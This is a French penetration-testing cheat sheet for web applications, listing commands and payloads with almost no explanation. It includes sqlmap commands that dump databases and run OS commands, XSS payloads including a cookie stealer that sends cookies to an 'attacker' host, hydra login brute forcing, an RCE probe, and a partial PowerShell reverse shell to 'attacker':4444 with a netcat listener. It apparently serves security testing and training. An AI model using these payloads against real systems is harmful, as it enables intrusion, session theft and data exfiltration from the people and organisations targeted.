Méthodologie complète pour tester la sécurité d'une application web.
Identifier la technologie, version serveur, endpoints et architecture.
# Scanner web
nikto -h target.com
# Headers analyse
curl -I target.com
# OWASP ZAP scan
zaproxy -cmd -quickurl http://target
# Extraire paramètres
gf -list | gf "php" target_urls.txt
# Brute force dirs
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
# JWT decode
jwt.io (online) ou jq
echo $token | jq -R 'split(".") | .[0], .[1] | @base64d'
# Test basique
sqlmap -u "http://target/page?id=1" --dbs
# Dump complet
sqlmap -u "http://target/?id=1" -D DB_NAME -T TABLE --dump
# Shell intéractif
sqlmap -u "http://target/?id=1" --sql-shell
# OS execution
sqlmap -u "http://target/?id=1" --os-cmd="whoami"
# Basique
<script>alert('XSS')</script>
# Cookie stealer
<img src=x onerror="fetch('http://attacker?cookies='+document.cookie)">
# SVG
<svg onload="alert('XSS')">
# HTML Event Handler
<body onload="alert('XSS')">
# Brute force login
hydra -l user -P passwords.txt http-post-form://target:login.php:username=^USER^&password=^PASS^
# Cookie analysis
curl -b "sessionid=ABC123" http://target/admin
# JWT Token Validation
https://jwt.io
# RCE basique
curl "http://target/cmd.php?cmd=id"
# Shell reverse PowerShell
powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient('attacker',4444);$stream=$client.GetStream();...
# Netcat listener
nc -lvnp 4444
| Vulnérabilité | Outils | Attaque |
|---|---|---|
| Injection SQL | sqlmap, Burp | sqlmap -u "url?id=1" --dbs |
| XSS | Burp, ZAP | <script>alert('XSS')</script> |
| CSRF | Burp CSRF POC | Requête POST forgée |
| RCE | curl, metasploit | Exec code système |
| Path Traversal | Burp, ZAP | ../../../etc/passwd |